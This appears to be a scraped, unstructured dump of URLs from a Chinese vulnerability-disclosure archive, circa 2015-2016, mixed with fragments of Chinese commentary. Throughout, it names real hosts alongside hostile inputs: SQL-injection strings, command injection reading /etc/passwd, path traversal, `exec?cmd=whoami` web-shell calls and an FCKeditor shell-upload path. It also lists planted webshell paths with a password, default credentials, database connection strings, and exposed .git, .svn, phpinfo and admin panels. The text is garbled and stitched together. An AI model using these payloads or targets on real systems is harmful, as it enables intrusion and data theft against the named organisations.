A74E8A8E61040DD87FCB1196C5B665A7:FG=1 www.hlslm.cn http://mba.usst.edu.cn/ActivityInformationDetail.aspx?Class_ID=48&InfoId=941 http://www.dsrwzsb.cn/lookdh.asp?id=814 http://www.dsrwzsb.cn/admin/ http://ad.12306.cn/ http://api.ycpai.com/app_api/message_detail?user_id=4099&page=1&login_code=43cdb559a0598d53a5f111221e8bf600&channel=QD_yyb&version=612 http://www.wx163.cn登录 http://123.138.29.71:8080/manage/login.html http://**.**.**.**/doc/refman/5.5/en/union.html http://**.**.**.**/bugs/wooyun-2016-0170433 http://cps.huatu.com/index.php/home/gourl/?source=htjysy http://cps.huatu.com/index.php/home/gourl/?source=htjysy http://mail.office.feng.com/.svn/pristine/ http://bigdata.feng.com/phpinfo.php http://s.feng.com/phpinfo.php http://61.129.68.58/phpinfo.php http://**.**.**/src.zip http://**.**.**.**/c/industry_news_details.php?itemid=479&page=1 http://www.**.**.**.**/c/corp_news_details.php?itemid=455&page=01 http://**.**.**.**/s/corp_news_details.php?itemid=455&page=01 
http://**.**.**.**/s/corp_news_details.php?itemid=455%27&page=01 http://**.**.**.**/bugs/wooyun-2010-0163764 http://traffic.founderbn.com/ http://cc.bnchina.com/admin/admin_login.aspx http://mem.usst.edu.cn/ActivityInformationDetail.aspx?Class_ID=38&InfoId=705 http://120.197.94.202:8080/ http://xiao.zymk.cn/index.php/user/index?userid=5973276 http://**.**.**.**/ http://**.**.**.**:8088/ http://**.**.**.**:8088/ http://**.**.**.**:8088/ http://**.**.**.**:8088/ http://mkdd.zymk.cn/index.php/gonglve/show?id=118 http://**.**.**.**:81/ http://**.**.**.**:81/ http://**.**.**.**:81/ http://**.**.**.**:81/ http://rsc.wh.sdu.edu.cn/login/Personnel.do http://www.cls.edu.cn/search/?action=search&keyword=1 http://zy.dbw.cn/Views/sq/Main/UserLogin.aspx http://www.xsteach.com/course/default/category?cid=102 http://www.openfind.com.tw/taiwan/epaper/elog.php?num=*&title=%E7%B6%93%E9%8A%B7%E5%95%86%E5%B0%88%E5%8D%80&url=http://www.openfind.com.tw/taiwan/partners/partners_overview.htm&userid={email http://www.openfind.com.tw/taiwan/epaper/elog.php?date=*&title=%E6%9C%80%E6%96%B0%E6%B6%88%E6%81%AF%20-%20Openfind%20MailBase%202.8%20%E6%90%9C%E5%B0%8B%E6%95%88%E8%83%BD%E5%86%8D%E9%80%B2%E5%8C%96%20%E6%9C%89%E6%95%88%E6%8F%90%E5%8D%87%E4%BC%81%E6%A5%AD%E8%B3%87%E5%AE%89%E7%B8%BE%E6%95%88&url=http://www.openfind.com.tw/taiwan/newsevents/news_detail.php?news_id=2180&userid={email http://www.openfind.com.tw/taiwan/epaper/elog.php?num={epaper_date}&title=%E7%B6%93%E9%8A%B7%E5%95%86%E5%B0%88%E5%8D%80&url=http://www.openfind.com.tw/taiwan/partners/partners_overview.htm&userid=* http://shop.caixin.com/ http://www.guodu.cc/)主站: http://**.**.**.**/sitesearching.php?sid=49 http://shoubashou.org/2244wwwcom/vvvsss/8888/index.asp http://shoubashou.org/index.php?m=Index&a=login http://222.22.224.142/ http://jyjjyj.e21.cn/e21admin/main.php http://mail.e21.cn/extmail/cgi/env.cgi http://meeting.e21.cn/web.rar http://smtp.e21.cn/extmail/cgi/env.cgi http://ushb.e21.cn/ 
http://211.152.48.110:99/uploadfile/ http://211.152.48.110:99/bin/ http://211.152.48.110:99/images/ http://127.0.0.1/phpwind_/www/index.php?m=design&c=api&token=RTwtIGEOYM&id=5&format=xml http://m.flyertrip.com/index.php/Admin/Login/login.html http://jsj.hznu.edu.cn/ggjxb/dmtwy/help/?ppp=1 http://jsj.hznu.edu.cn/ggjxb/dmtwy/help/detail.asp?Qid=28 http://jsj.hznu.edu.cn http://vip.nawang.cn/.git/ http://www.12yao.com/user/log.txt http://app.yiwugou.com/login/address/json_update.htm?oaid=182108&uuid=74e272e0d46d75860b264d1ed750b32c http://www.dongfeng-honda.com/ http://www.dongfeng-honda.com/spirior-xrv/index.php http://**.**.**.**/news_detail.php?type=news&na_id=2295 http://bioinformatics.cau.edu.cn/cgi-bin/easygo/showObjects.pl?calledfrom=2&db=go&id=13255 http://xinli.cau.edu.cn http://**.**.**.**/read/993653ea650ebe1eacc2c1b2.html http://服务器 http://**.**.**.**:7001/netrep/login.jsp。 http://**.**.**.**/bugs/wooyun-2015-0161989的后续。在**.**.**.**版本中downloadInterface.OpenURL已经不能被**.**.**.**以外的非特权域网页调用了,但是http://**.**.**.**下的页面仍然可以调用这个API来下载任意文件,并且可以使用downloadInterface.RunDownloadItem运行它。由于**.**.**.**没有强制HTTPS,导致中间人可以将用户的任意明文请求劫持跳转到http://**.**.**.**/,跳转之后再次劫持http://**.**.**.**这个请求,返回http://**.**.**.**/bugs/wooyun-2015-0161989中的利用代码。即可导致执行任意代码。 http://**.**.**.**/bugs/wooyun-2015-0161989中的代码到本地C:\rce.html EXACT:http://**.**.**.**/ http://**.**.**.**/。 http://localhost/Tipask_v2.5_UTF8/tipask/?user/register.html http://member.9978.cn/favorite/del_info/id/1473 http://xxxxxxxxx:7288/devicetype/ http://xxxxxxx:7288/mediaconfig/ http://xxxxxxx:7288/mediastatus/ http://xxxxxxxx:7288/remoteupdate/ http://xxxxxxx:7288/serverlog/ http://xxxxxxx:7288/signalconfig/ http://xxxxxx:7288/signalstatus/ http://xxxxxx:7288/transformserver/ http://xxxxxxxxx:7288/userinfo/ 
http://oa.zhiyin.cn/employee/admin/login.action?result=4f2deccf84ff704da8b5b29b2f44dd4ecb0cb0405e46bfdd4d6c080ecce83b4baa09d88aef32897f8ba56271e525caeba3aa4008beea1a803ae6670a4e877fffa5e90885d65012c14870d8e8da38db5aefd2da6cda84d925e27dce602f349af9619af93295747de58985f71dbb96dddc6a03ee4f47d7002bddf431d7ae340872 http://r.t.qq.com/cbdata/vist/jumpPage?url=http://XXXXXX.xx http://www.changhong.com.cn/zigongsi.htm http://www.hongxing799.com http://www.hongxing799.com/Products/View.asp?id=424 http://www.hongxing799.com/News/index.asp?Menu=%B9%AB%CB%BE%D0%C2%CE%C5 http://www.hongxing799.com/Products/List.asp?Bigid=312&smallid=281 http://www.hongxing799.com/admin/ http://www.hongxing799.com/fckeditor/editor/filemanager/browser/default/browser.html http://www.hongxing799.com/fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image¤tfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684 http://kt.changhong.com/ http://www.sydoil.com/services_detail.asp?id=1629 ftp://wxshop.vivo.com.cn/ http://wxshop.vivo.com.cn http://li.yonyou.com/test.aspx http://www.jjhotels.cn/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://180.169.84.55:7001/ghwx/ http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274 http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274 http://www.gerunzs.com/products/ http://www.gerunzs.com/gerun_admin/admin_index.asp http://www.gerunzs.com/database/ http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274 http://www.gerunzs.com/fckeditor/ http://www.gerunzs.com/fckeditor/editor/ http://www.gerunzs.com/fckeditor/editor/filemanager/connectors/asp/ http://www.gerunzs.com/fckeditor/editor/dialog/ http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/browser.html http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/frmupload.html http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php http://www.gerunzs.com/test/ 
http://www.gerunzs.com/products/ http://www.gerunzs.com/images/ http://99pms.99inn.cc/ http://m.bypay.cn/invoker/JMXInvokerServlet http://**.**.**.**/ WxServer.asmx/GetMap http://dygx.scuec.edu.cn http://esn.chaoke.com http://www.upesn.com regfile:AAAAAAAAAAAAA regfile:AAAAAAAAAAAAA regfile:AAAAAAAAAAAAA regfile:AAAAAAAAAAAAA vbefile:XXXXXXXXXXXX vbefile:XXXXXXXXXXXX vbefile:XXXXXXXXXXXX vbefile:/../1.js vbefile:/../1.js vbefile:/../../../已知路径/1.js"的方式来执行这个文件。 http://**.**.**.**/test/all/cache.php vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 vbefile:/../../../../../../../../../Users/gainover/AppData/Roaming/Baidu/baidubrowser/user_data/default/chrome_profile/Cache/f_0001b7 http://**.**.**.**/bugs/wooyun-2010-096413) http://**.**.**.**/app-res.html display:none http://**.**.**.**/app-res.html http://**.**.**.**/app-res.html http://m.12yao.com http://202.108.65.139:8080/axis2/axis2-admin/ http://202.108.65.139:8080/axis2/services/Cat/exec?cmd=whoami http://developer.qt.nokia.com/ows-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| http://**.**.**.**/test/all/readme.htm http://**.**.**.**/bugs/wooyun-2010-0175902 vbefile:/../../../已知路径/1.js vbefile:/../../../已知路径/1.js vbefile:/../../../缓存文件"的方式来执行恶意缓存文件。 vbefile:/../../../../../../../../../Users/用户名/AppData/Local/Temp/Maxthon3Cache/Temp/Webkit/Cache/缓存文件名 http://mail.jiashuangkuaizi.com http://www.99inn.cc/ForgetPassword/ https://ring0.me/2015/08/exploit-dns-server-with-one-packet/ http://youth.hznu.edu.cn/admin/login.php 
http://seeyonqd.seeyon.com/seeyon/index.jsp http://seeyonqd.seeyon.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy http://www.juse.or.jp/src/information/detail.php?im_id=165 http://game.touzhu.cn/PLBRegesterLogin.aspx?u1=9&u2=w051404这个位置没有验证码没有登录限制 http://zrds.zrhsh.cn/ZRapp/getSendAddressListByUserId http://**.**.**.**/ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/bea_wls_internal/wooyun.jsp password:w00yunjsp jdbc:oracle:thin:@**.**.**.**:1521:lgy http://zrds.zrhsh.cn/ZRapp/getLocationArea http://**.**.**.**/doc/refman/5.5/en/union.html http://**.**.**.**/bugs/wooyun-2016-0170481 http://211.150.76.88:8000/console http://www.jsf.or.jp/common/scheduleMonth.php?date= http://www.jsf.or.jp/common/scheduleMonth.php?date= http://**.**.**.**/bugs/wooyun-2016-0174251,他的是一个链接自带cookie的,然后就无需cookie了。 http://jixie.usst.edu.cn http://www.this.ne.jp/news/detail.php?nid=661 http://bjbio.cau.edu.cn http://ehome.zte.com.cn/admin/backendUi!login.do https://help.marketing.yahoo.co.jp http://m.taohv.cn/list.php?top_cat_id=31 https://**.**.**.**/p/chromium/codesearch#chromium/src/chrome/browser/devtools/devtools_ui_**.**.**.**&sq=package:chromium&type=cs&l=638)里提到了chrome-devtools的一个本地文件读取的漏洞(情报来自@sogili(长短短)) chrome-devtools://devtools/bundled/inspector.html?remoteBase=https://**.**.**.**/&remoteFrontend=true https://**.**.**.**/screencast_module.js http://exam.open.com.cn/matriculationonline/login.asp http://exam.open.com.cn/matriculationonline/login.asp http://m.finance.yahoo.co.jp http://m.finance.yahoo.co.jp/stock/holder?code=2294 http://file.locojoy.com/../../../../../../../../../../../../../etc/passwd http://www.acfun.tv/member/signSubmit.aspx http://www.acfun.tv/api/mail.aspx?name=newMail http://www.acfun.tv/api/friend.aspx?name=getFollowedList&pageNo=1&pageSize=10 
http://www.acfun.tv/member/profile.aspx http://xxxxxx” http://**.**.**.**/news_detail.php?id=175 http://sjdy.inspur.com/app/servlet/validate http://189jk.cn http://erp.dmall.com/login?returnUrl=http%3A%2F%2Ferp.dmall.com%2F data:text/html,chromewebdata http://zjxds.glodon.com/index.php?m=admin http://echosystem.kibey.com/user/follow-list http://echosystem.kibey.com/index/code http://echosystem.kibey.com/index/reset-password http://echosystem.kibey.com/user/friend?page=1&platform=mobile http://zb-pre.glodon.com/ http://zb-pre.glodon.com/jmx-console/ http://m.candou.com/user/login/ http://acm.sdut.edu.cn/sdutoj/setting.php?userid=18790 http://sxyd.sdut.edu.cn/luntan/topic.asp?id=24 https://github.com/joyxee/yipeizhen/blob/44599f69a420bcab34447db6f3af43a679755609/build/classes/yk/util/email-config.properties http://cast.cau.edu.cn/BAGI/NationPrise/%E7%A4%BE%E5%9B%A2%E6%9C%BA%E5%85%B3%E4%BC%81%E4%BA%8B%E4%B8%9A%E5%8D%95%E4%BD%8D-%E4%BF%AE%E6%94%B9%E9%83%A8%E9%97%A8%E4%B8%8E%E4%BA%BA%E5%91%98.asp?xgID=64 http://core.csu.edu.cn www.letao.com http://www.letao.com http://maps.yahoo.co.jp http://maps.yahoo.co.jp/provider/api_world_category.php?output=xml&iso=&g2=&_i=1&g1=1 http://www.acmicpc.sdnu.edu.cn/xh/asingle.php?pg=3 http://www.letao.com/wap/pay/address.aspx?uuid145 http://www.letao.com/wap/app_download.aspx?op=bra http://218.193.130.165:8080/ http://218.193.130.165:8080/ http://**.**.**.**/guide/details.php?g=10%20AND%201=1--&btn_id=d-regist_20151022_B_menu_flow http://qjtyw.hznu.edu.cn http://**.**.**.** http://westsecu.21tb.com/login/login.logout.do http://icbe.cau.edu.cn content-type:text/html cache-control:no-cache http://**.**.**.**/bugs/wooyun-2010-0125719),上一个漏洞提到了http://**.**.**.**:8181/spam/system/index.action的通用密码。然而,tmailer不只8181端口有后台,2060端口还有一个更高端的后台,也存在写在代码中的通用密码,该密码在测试代码中。关于8181后台进入的更多内容,可以关注我的另一个漏洞:http://**.**.**.**/bugs/wooyun-2016-0176050,将在2016-04-03 https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ 
https://**.**.**.**:2060/tmailerAdmin/ https://mail.t**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ https://**.**.**.**:2060/tmailerAdmin/ http://**.**.**/gdrWeb/ user:tomcat pwd:tomcat http://**.**.**/gdrWeb/whoissb.jsp jdbc:oracle:thin:@10.47.0.66:1521:gpay https://**.**.**.**/guide/category.php?c=3,丢入sqlmap跑 http://shop.zymk.cn/index.php/goods/index/id/3774 http://lib.jiangtai.com/common/easyQueryVer3/EasyQueryXML.jsp http://lib.jiangtai.com/common/easyQueryVer3/EasyQueryXML.jsp http://**.**.**.**/index.php?app=search&vip=1&act=seller&classid=435&type=img http://www.anxiang.gov.cn/jact/front/front_mailwrite.action http://**.**.**.**/bugs/wooyun-2015-0140915 http://app.cheshi.com/topic/1027jeep/insert.php http://traveler.cnooc.com.cn/names.nsf http://traveler.cnooc.com.cn/names.nsf中去找管理组成员 http://**.**.**.**/bugs/wooyun-2010-037211) http://shop.zymk.cn/index.php/home/category/index/id/1?order=click_count http://www.pkuedupx.com/newsview.php?cid=161 http://**.**.**.**/s/1i4kApfR http://rb.tcl.com/shell.jspx http://www.enet.com.cn/house/housesearch.jsp http://imserver.xiaozhu.com:8080/leave?fromUserClientType=ios&fromUserId=1823761635&sessionId=b7f0e6b0bb8faa927c9f4f8578ff0c83&token=e26deec63251aa67274c3eaa1d0570d8 http://www.res.cqu.edu.cn/newslist.php?key=A%%27%20union%20select%201,@@basedir,3,4,5,6,7,8,9,0,1%23 http://dichan.sina.com.cn/ http://ncfz.cau.edu.cn/newsshow.aspx?board=%CE%C4%BC%FE%CD%A8%D6%AA&id=114 http://www.mkzhan.com/index.php/read/showTucao/ http://www.kankan.com/ http://vod.kankan.com/v/85/85338.shtml http://20160225.float.sandai.net/finalfiles/n1455701640467.flv http://float.sandai.net/finalfiles/n1454753296536.flv http://dev.anzhuoapk.com/ http://dev.anzhuoapk.com/application/AppShoufa/details?shoufaid=5960 http://dev.anzhuoapk.com/application/application/details?app_id=67513 http://dev.anzhuoapk.com/application/AppShoufa/details?shoufaid= 
http://mapp.dahuatech.com http://jiaowu.sicau.edu.cn http://www.onceok.com.tw/)首页: http://43.241.211.74:8080/ http://43.241.211.74:9000/ http://www.onceok.com.tw/)主站首页: http://edf.cqu.edu.cn http://haomaiyi.com/.git/config http://git.shiyijian.cc/users/sign_in http://sentry.shiyijian.cc/register/ http://122.226.44.21:5555/ http://ecases.medlive.cn/list-zhuanqu-132.html?issearch=1&searchcontent=e&searchkey=1 http://dev.anzhuoapk.com/ http://t.cn/ http://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5961&package=com.bccv.meitu&act=business http://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5967&package=com.bccv.meitu&act=business key:m$a@i-t%i*a&n http://www.onceok.com.tw/scenic.php?id=1 http://z.mytest:81/是我host配来测试用的,复现时自己本地搭建一下环境吧~ http://**.**.**.**/dede http://**.**.**.**/xlcst.php https://github.com/ipconfiger/OpenStore/blob/master/settings.py mysql://root:123456@127.0.0.1:3306/orbit?charset=utf8 http://mall.easy-pec.com/ecmall/ http://mall.easy-pec.com/ecmall/toReg/toPerson.do http://mall.easy-pec.com/ecmall/verificationEmail/emailAndCodeCheck.do http://jk.tiexue.net/ https://**.**.**.**/cmccb/servlet/ccbNewClient http://studyinhznu.hznu.edu.cn http://scc.cau.edu.cn/scc/index.php?do=loginCheck&granttype=&password=1&username=schmksqh http://kxddjs.cqu.edu.cn/kxddjs/getContent.lxs?id=89 http://community.oppo.com/th/.svn/entries http://domain/sta/export/referrerSta.jsp http://domain/sta/export/chatTopicSta.jsp http://domain/sta/export/chatHoursSta.jsp http://domain/sta/export/chatUrlSta.jsp http://cscul.scuec.edu.cn/jeeadmin/jeecms/login.do http://api.m.zhuqu.com:8983/solr/ http://www.zhuqu.com:8983/solr/ http://m.zhuqu.com:8983/solr/ http://t.zhuqu.com:8983/solr/ http://{host}:{port}/seeyon/services/authorityService?wsdl http://**.**.**/a/2015/09-09/946261.html cn:8008 http://push.feng.com/index.php?r=api/client/startdevicecall http://www.oppodigital.com.tw/club_register.php?act=check_username&username= 
http://www.oppodigital.com.tw/club_register.php?act=check_username&username= http://guanli.letao.com/ http://guanli.letao.com/wap/shoe.aspx?add=&iid=123&pid=967243173 http://guanli.letao.com/wap/app_download.aspx?op=brand&bid=14 http://guanli.letao.com/wap/pay/address.aspx?tid=0&form=0&addressid=&aid=130706&cid=130700&pid=130000&uuid1453881206&add=&c=&op=newadd http://oa.tmt.tcl.com http://wooyun.org/bugs/wooyun-2015-0157774 http://denglish.e21.cn:80/ http://119.29.48.224/aboutUs.html http://alumni.cqu.edu.cn http://27894352.blog.hexun.com/104764428_d.html www.tudou.com http://www.tudou.com http://218.17.200.230:9004/casserver/login?service=http%3A%2F%2F218.17.200.230%2Fj_acegi_security_check http://218.17.200.230:9001/job/2010.jsp http://survey.minanins.com:9001/console/login/LoginForm.jsp http://extplat.minanins.com:8011/console/login/LoginForm.jsp http://simple.minanins.com:8021/console/login/LoginForm.jsp http://mail.minanins.com:9001/console/login/LoginForm.jsp http://woodscience.csuft.edu.cn/test/Common/GetDataHandler.ashx?departmentId=20&key=GetProfessionComboboxJson http://os.open.com.cn:80/WebApi_Public/Account/User/Login?username=admin&password=1111&%E6%8F%90%E4%BA%A4=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2 http://os.open.com.cn:80/WebApi_Public/Account/User/Login?username=admin&password=1111&%E6%8F%90%E4%BA%A4=%E6%8F%90%E4%BA%A4%E6%9F http://120.197.138.117:50070/dfshealth.jsp http://wb.west95582.com/manage/login.html http://zabbix.xin.com/zabbix/ http://**.**.**.**/bugs/wooyun-2010-0170984 http://hzya.oicp.net:8080/ www.oicp.net属于花生壳 http://hzya.oicp.net:8080/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml jdbc:sqlserver://127.0.0.1:1433;database=nc55;sendStringParametersAsUnicode=false http://yjs.nwu.edu.cn/admin.php?mod=phpcms&file=login&referer=http%3A%2F%2Fyjs.nwu.edu.cn%2Fadmin.php http://oa.21tb.com/ http://218.197.70.92:1128/ http://218.197.70.92:1128/upload/users/dqy/in.jsp jjh.sdu.edu.cn/about.php?id=1&sid=1 
http://recruit.usj.co.jp/career/information/index.html?archive=2015-07 http://218.94.40.6:8080/hrss/rm/RmMain.jsp?dsName=ncdl http://218.94.40.6:8080/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml http://**.**.**.**/login)存在jboss漏洞,目前能够成功溢出并上传网马,同事发现已经存在网马。 http://www.flyertrip.com/member/?dopost=vieworder&orderid=1228&ordertype=2 http://pub2.whut.edu.cn/trans/adminlogin.asp http://opac.hznu.edu.cn https://mall.nesc.cn/m/mall/index.html#!/main.html http://game.touzhu.cn登录位置有验证码限制 http://www.kesion.com/model/viewlist.aspx https://account.glodon.com http://servicea.glodon.com/admin_000_000_001.axml?q=eJyKjw8uSSxJtQ0tTi0KqSxIdS0qyi9Si48H8f0Sc1NtczJLszIT87JK8wAAAAD%2f%2fw%3d%3d http://weixin.glodon.com/index.php?m=Index&a=login http://bi.gldjc.com http://gix5-stag.glodon.com http://gix5.glodon.com http://mjjt.fwxgx.com http://yjz.glodon.com/index.do http://im.guodu.com:9090/live/p.do?command=leaveMessage&c=1&v=11c69daab9b04b14843da30a70d07253&u=11c69daab9b04b14843da30a70d07253&f=1&lang=sc http://denglish.e21.cn:80/ http://**.**.**.**/: http://ht.myaora.net:82 http://dealer.youxinpai.com/login/index/ http://skin.maxthon.cn这个是傲游皮肤中心的网站,登录框无登录限制 http://lgradio.sdut.edu.cn/guangbotaizj/list.asp?bumen=-1 http://lgradio.sdut.edu.cn http://ast.cqu.edu.cn/ast/contentmetting.jsp?hyid=655 http://**.**.**.**/bugs/wooyun-2015-0151898 Author:liucj sqlite:/icac/db/icac_cfg/icac_cfg.db http://shop.boqii.com/ajax.html?ctl=productlist&act=proActivity http://www.roowei.com/js/Album.js.php?action=Select_album&class=0&diqu=0&limit=7 content-type:text/html cache-control:no-cache http://59.108.32.40/NGOSS/login.action http://219.232.48.46/NGOSS/login.action http://59.108.80.106/NGOSS/login.action http://121.5.128.198/NGOSS/login.action http://59.108.32.40/NGOSS/login.action http://w.star.kankan.com/?birthday=2000&stature=170&level=0&sex=0&order=id http://playme.the9.com/user?method=account&id=1 http://playme.the9.com/user?method=account&id=1 
http://localhost:8088/ws http://localhost:8088/ws/query?wsdl http://blog.onlylady.com http://m.baozoumanhua.com这个登录位置没有验证码没有登录限制: http://222.168.65.172 http://m.163disk.com/m.163disk.com.zip http://jw.sthu.edu.cn/service.asmx?op=GetStuCheckinInfo的soap请求放在burp xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string http://112.124.211.169:8089/ http://112.124.211.169:8089/services/Cat/exec?cmd=cat%20whoami http://www.meishichina.com/Topic.rar http://www.meishichina.com/YuanLiao.rar http://do.meishichina.com/phpmyadmin/ http://cdn.meishichina.com/phpmyadmin/ http://do.meishichina.com/1.php http://cdn.meishichina.com/1.php http://118.244.233.114:8080/ http://www.onceok.com.tw/store.php?id=10123396&goods_type_id=gt00000001 http://www.onceok.com.tw/store.php?id=10123396&goods_type_id=gt00000001 http://kygl.jgsu.edu.cn/kygl/PersonalIntroduce.aspx?userid=2613 http://mkdd.zymk.cn/admin.php http://mkdd.zymk.cn/index.php/gonglve/show?id=118 http://mkdd.zymk.cn/index.php/gonglve/show?id=118 http://sqlmap.org coding:utf-8 http://skyhome.skyworthbox.com/ http://westsecu.21tb.com/login/login.logout.do http://rexian.e23.cn/ http://yjs.xust.edu.cn/enrollment_work.asp?id=36&bh=661 http://manu34.magtech.com.cn/Journalx_xidian/Login.action;jsessionid=80E632DFF08F795B45457D3E878D4344 http://webchat.haohaizi.com/ admin:admin http://dns.admin5.com/phpinfo.php http://ec.admin5.com/include/downmix.inc.php http://ad.admin5.com/.svn/entries index.php/Index/dofindPsd http://jjc.xidian.edu.cn http://zs.vivo.com.cn/vivo.zip http://search.zaojiao.com/search/cat?cids=1&t=mrwy http://www.mysleepace.com/cn/Index/goods/id/2*/nav/2/attr/0/shop_count/1/p/2/0/shop_count.html http://www.oohaney.com/Trip/lists?cid=1 http://research.enet.com.cn/questionnaire/publish/CountPaper.jsp?paperID=0002000114b9b6c3c9 http://guanli.letao.com/letaozu/articlelist.aspx?id=1697 
http://www.api.zhuna.cn/e/json_app.php?agentId=182&hid=25306&orderfrom=182&os=iphone&tm1=2016-02-28&tm2=2016-02-29&unionId=0&ver=20&version=3.2.7 http://58.211.5.203/admin/ https://github.com/wmrococo/idsync/blob/2da7845ca98b1a32acaab2cc008e729f6628f137/src/main/java/cn/com/admaster/utils/MailHelper.java https://42.62.104.78/AppServiceV1_1.asmx/GetOrderList?pageIndex=1&pageSize=10&pmsMemberId=105982962&type=0 https://42.62.104.78/AppServiceV1_1.asmx/GetOrderList?pageIndex=1&pageSize=10&pmsMemberId=105982960&type=0 https://42.62.104.78/AppServiceV1_1.asmx/GetOrderList?pageIndex=1&pageSize=10&pmsMemberId=105982949&type=0 https://42.62.104.78/AppServiceV1_1.asmx/GetOrderList?pageIndex=1&pageSize=10&pmsMemberId=105982223&type=0 http://vip.now.net.cn/.git http://vip.now.net.cn/api/svn_host.php http://webmail.now.net.cn/api/svn_host.php http://webmail.now.cn/api/svn_host.php http://mx600.now.net.cn/api/svn_host.php http://mx601.now.net.cn/api/svn_host.php http://mx602.now.net.cn/api/svn_host.php http://mx603.now.net.cn/api/svn_host.php http://mx604.now.net.cn/api/svn_host.php http://mx605.now.net.cn/api/svn_host.php http://mx606.now.net.cn/api/svn_host.php http://mx621.now.net.cn/api/svn_host.php http://mx622.now.net.cn/api/svn_host.php http://mx623.now.net.cn/api/svn_host.php http://mx626.now.net.cn/api/svn_host.php http://mx629.now.net.cn/api/svn_host.php http://ka.263.net/ http://ka.263.net/api.php http://career.upc.edu.cn/enterprise/detail.asp?id=*&xl=%B1%BE%BF%C6 http://**.**.**.**/WF_YB/upload/css.jsp http://**.**.**.**/WF_YB/upload/css.jsp http://**.**.**.**/WF_YB/upload/css.jsp http://m.zznissan.com.cn http://acm.sdut.edu.cn/sdutoj/contest_show.php?contest_id=1682 http://acm.sdut.edu.cn/sdutoj/contest_status.php?cid=1682 http://acm.sdut.edu.cn/sdutoj/problem.php?action=showproblem&problemid=1000 http://acm.sdut.edu.cn/sdutoj/setting.php?userid=20789 http://po.myaora.net:81/rechange/act.php?t=web&id=2 https://app.yinxiang.com/Registration.action 
http://www.oppodigital.com.tw/.svn/entries http://www.bjtu-hedu.com/ http://www.bjtu-hedu.com/include/config.inc.php?-s http://www.bjtu-hedu.com/search/index.php?-s http://**.**.**.**/bugs/wooyun-2016-0178904 http://www.heinet.cn/cacti/ http://58.61.161.99 https://175.25.168.142 http://122.11.39.87/.svn/entries http://**.**.**/seePublicInfo.doid=23&a=1 http://59.37.32.133/ http://www.vipkid.com.cn/forget NULL:null https://github.com/evolsnow/python-example/blob/6c6bb569367a9c3c3ff882a0fb10fd4e4e39f06b/zmz.py https://github.com/MrWhoareyou/course/blob/e5d8cffcd21cec4ead96ef89ae521f6480f7fd32/Application/Common/Conf/config.php http://oa.21tb.com/ http://danlu.com/ http://101.200.142.42/ https://github.com/mGoogle/LearnGit/blob/231c93d5304c34f45815d76eb1d41808c8a7a1ec/account.txt http://182.92.230.201/svn/oc/%E5%95%86%E6%88%B7%E5%8F%B7%E4%B8%8E%E5%95%86%E6%88%B7%E8%B5%84%E6%96%99/ http://182.92.230.201/svn/oc/oc/%E5%9F%BA%E7%A1%80%E4%BF%A1%E6%81%AF/POS%E6%9C%BA%E7%AE%A1%E7%90%86/ http://182.92.230.201/svn/pm/01.%E7%AE%A1%E7%90%86%E6%96%87%E6%A1%A3%E5%BA%93/0102.%E4%BA%BA%E5%91%98%E7%AE%A1%E7%90%86/ http://182.92.230.201/svn/op/ssl/www.danlu.com%E6%AD%A3%E5%BC%8F/ http://openmail.qq.com/cgi-bin/dy_template?t=dy_iframe&sid=SIIWuQeaF-YjcmA2#column/modify/1329563954t3814693792t12721 http://hjsm.tom.com/登录位置无验证码无限制 http://wooyun.org/bugs/wooyun-2016-0177667 http://dev.anzhuoapk.com/ http://gameuser.pipi.cn:8080/,存在目录遍历,可查看上传文件绝对路径、数据库配置、库文件、支付宝配置文件、大量源码等敏感信息。 http://cas.xtepchina.com/ http://cast.xtepchina.com jdbc:jtds:sqlserver://192.168.3.94:1433/txtep jdbc:jtds:sqlserver://192.168.3.112:1433/xtep http://bi.xtepchina.com:8090/loginIn.action http://lsh.xtepchina.cn/selfhelp/Attendance.aspx http://101.251.233.156:9200/_search?preety http://101.251.233.156:9200/_nodes http://101.251.233.156:9200/_plugin/head/ http://**.**.**.**/TR/html4/loose.dtd http://www.gjzq.cn/ http://139.210.101.102:8888/2013yangcai 
